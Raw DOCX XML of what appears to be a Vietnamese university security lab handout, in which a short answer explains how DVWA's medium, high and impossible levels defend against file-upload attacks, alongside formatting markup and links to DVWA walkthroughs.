                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6172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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="2552700" cy="1219200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="13"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25527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2.2. Tham khảo mã nguồn (view source), giải thích ngắn gọn cách DVWA với security ở mức độ medium, high, impossible ngăn chặn tấn công khai thác lỗi File upload.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">- Medium: loại file được phép tải lên là image/jpeg bằng cách kiểm tra tên tệp, kích thước tệp, kiểu</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tệp và lấy chuỗi sau dấu chấm “.” để lấy được loại file trong cú pháp thẻ img. Ví dụ: &lt;img src="img_</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">girl.jpg" alt="Girl in a jacket" width="500" height="600"&gt; sẽ lấy được jpg.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">- High: kiểm tra có phải là ảnh không nếu không thì không tải lên bằng cách phân tích các thông</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tin file, cho phép jpg, jpge, png file.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">- Impossible: có nhiều biện pháp bảo mật làm cho việc tải file không phải ảnh là không thể.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:i w:val="0"/>
          <w:color w:val="ff0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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---HẾT---</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000060">
      <w:pPr>
        <w:ind w:left="72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45" w:type="default"/>
      <w:pgSz w:h="15840" w:w="12240" w:orient="portrait"/>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ind w:left="90" w:firstLine="0"/>
      <w:rPr>
        <w:b w:val="1"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:rtl w:val="0"/>
      </w:rPr>
      <w:t xml:space="preserve">BMMMT&amp;HT - Khoa CNTT&amp;TT </w:t>
    </w:r>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:rtl w:val="0"/>
      </w:rPr>
    </w:r>
  </w:p>
  <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000063">
    <w:pPr>
      <w:rPr>
        <w:b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20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.pn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X87Ubv-qDm4?list=PLHUKi1UlEgOJLPSFZaFKMoexpM6qhOb4Q" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mrudnitsky/dvwa-guide-2019/blob/master/low/Challenge%2012:%20XSS%20(Stored).md" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://youtu.be/P1I9UGpGdrU?list=PLHUKi1UlEgOJLPSFZaFKMoexpM6qhOb4Q" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://bughacking.com/dvwa-ultimate-guide-first-steps-and-walkthrough/#XSS_Stored" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/playlist?list=PLkhsQ56XEcBLwi8Kj8YRR9c1XOG9ES6Ou" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mrudnitsky/dvwa-guide-2019/blob/master/low/Challenge%2010:%20XSS%20(DOM).md" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://bughacking.com/dvwa-ultimate-guide-first-steps-and-walkthrough/#XSS_DOM" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mrudnitsky/dvwa-guide-2019/blob/master/low/Challenge%2005:%20File%20Upload.md" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://bughacking.com/dvwa-ultimate-guide-first-steps-and-walkthrough/#File_Upload" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://youtu.be/K7XBQWAZdZ4?list=PLHUKi1UlEgOJLPSFZaFKMoexpM6qhOb4Q" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.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